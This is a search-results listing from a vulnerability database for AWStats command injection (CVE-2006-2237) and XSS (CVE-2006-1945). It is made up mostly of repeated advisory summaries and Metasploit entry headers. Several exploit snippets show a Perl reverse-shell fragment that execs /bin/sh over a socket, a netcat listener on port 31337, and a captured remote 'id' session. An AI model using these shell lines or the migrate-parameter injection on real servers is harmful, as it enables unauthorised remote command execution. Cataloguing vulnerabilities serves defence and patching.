659 matches found
CVE-2006-2237
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...
Code injection
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...
CVE-2006-2237
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...
DEBIAN-CVE-2006-2237
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...
CVE-2006-2237
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...
CVE-2006-2237
AWStats 6.4 and 6.5 are affected by CVE-2006-2237 due to missing sanitization of the migrate parameter, enabling remote code execution when statistics updates are enabled. Evidence from multiple advisories and exploit records shows an external attacker could run arbitrary commands via the migrate...
CVE-2006-2237
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...
CVE-2006-2237
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter...
AWStats migrate Parameter Arbitrary Command Execution
The remote host is running AWStats, a free logfile analysis tool written in Perl. The version of AWStats installed on the remote host fails to sanitize input to the 'migrate' parameter before passing it to a Perl 'open' function. Provided 'AllowToUpdateStatsFromBrowser' is enabled in the AWStats...
AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit
Exploit for cgi platform in category web applications =============================================================== AWStats &CLIENT";openSTDOUT,"&CLIENT";openSTDERR,"&CLIENT";ifforkexec "/bin/sh"; exit0; ;''; class rbawstatsMigrate: url = '' user = '' password = '' auth = False chost =False...
AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit
No description provided by source. !/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org...
AWStats 6.5 - migrate Remote Shell Command Injection
AWStats 6.5 - migrate Remote Shell Command Injection !/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from...
AWStats 6.5 - 'migrate' Remote Shell Command Injection
!/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org 65.99.197.147 53377 id uid=81apach...
AWStats 6.4-6.5 AllowToUpdateStatsFromBrowser Command Injection
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
AWStats 6.4 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)
AWStats 6.4 6.5 - AllowToUpdateStatsFromBrowser Command Injection Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)
$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'AWStats...
awstats -- arbitrary command execution vulnerability
OS Reviews reports: If the update of the stats via web front-end is allowed, a remote attacker can execute arbitrary code on the server using a specially crafted request involving the migrate parameter. Input starting with a pipe character "|" leads to an insecure call to Perl's open function and...
CVE-2006-1945
Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the config parameter. NOTE: this might be the same core issue as CVE-2005-2732...
DEBIAN-CVE-2006-1945
Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the config parameter. NOTE: this might be the same core issue as CVE-2005-2732...
Cross site scripting
Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the config parameter. NOTE: this might be the same core issue as CVE-2005-2732...